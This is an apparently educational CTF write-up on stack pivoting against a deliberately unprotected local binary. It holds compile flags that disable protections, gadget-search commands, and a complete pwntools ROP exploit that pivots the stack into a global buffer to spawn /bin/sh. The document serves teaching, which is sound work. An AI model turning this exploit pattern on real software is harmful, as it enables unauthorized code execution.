Simple PWN - 0x09(stack pivoting)
tags: CTF PWN eductf
Stack Pivoting background
It was used when stack overflow bytes not big enough to access a shellcode but it has another lots of writable space can be accessed. More detailed info. can refer to Binary Exploitation (Pwn)
Original Code
1 | |
- You can observe that it has not much stack buffer overflow can use, but it has global variable
namewith space0x80(can be another stack)1
$ gcc -o stack_pivoting stack_pivoting.c -no-pie -fno-stack-protector -z norelro -zexecstack -static -
Note that
: must use
mprotectto change permission of global variablenamejust like lecture 0x04, add these line in original code1
2#include <sys/mman.h> mprotect(0x403000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC);Before
mprotect-vmmap
After mprotect-vmmap
Exploit
- Construct
ROPchain1
2
3objdump -d -M Intel stack_pivoting | grep "<name>" ROPgadget --binary stack_pivoting --only "pop|ret|syscall|leave" > one_gadget vim one_gadget

- Find address of variable
name1
objdump -d -M Intel stack_pivoting | grep "<name>"
- Whole exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28from pwn import * context.arch = 'amd64' r = process('./stack_pivoting') raw_input() name = 0x4c70c0 leave_ret = 0x40182d pop_rdi_ret = 0x401ecf pop_rsi_ret = 0x409efe pop_rax_ret = 0x44fd07 pop_rdx_rbx_ret = 0x485b2b syscall = 0x401c84 ROP = b'/bin/sh\x00' ROP += flat( pop_rdi_ret, name, pop_rsi_ret, 0, pop_rdx_rbx_ret, 0, 0, pop_rax_ret, 0x3b, syscall ) r.sendafter("Give me your name: ", ROP) raw_input() r.sendafter("Give me your ROP: ", b'a'*0x10 + p64(name) + p64(leave_ret)) r.interactive()- First, write
ROPchain to global variablename - Next, use 2
leave ; retto pivotnameas a stack
- First, write
- Finally, you got shell!!!
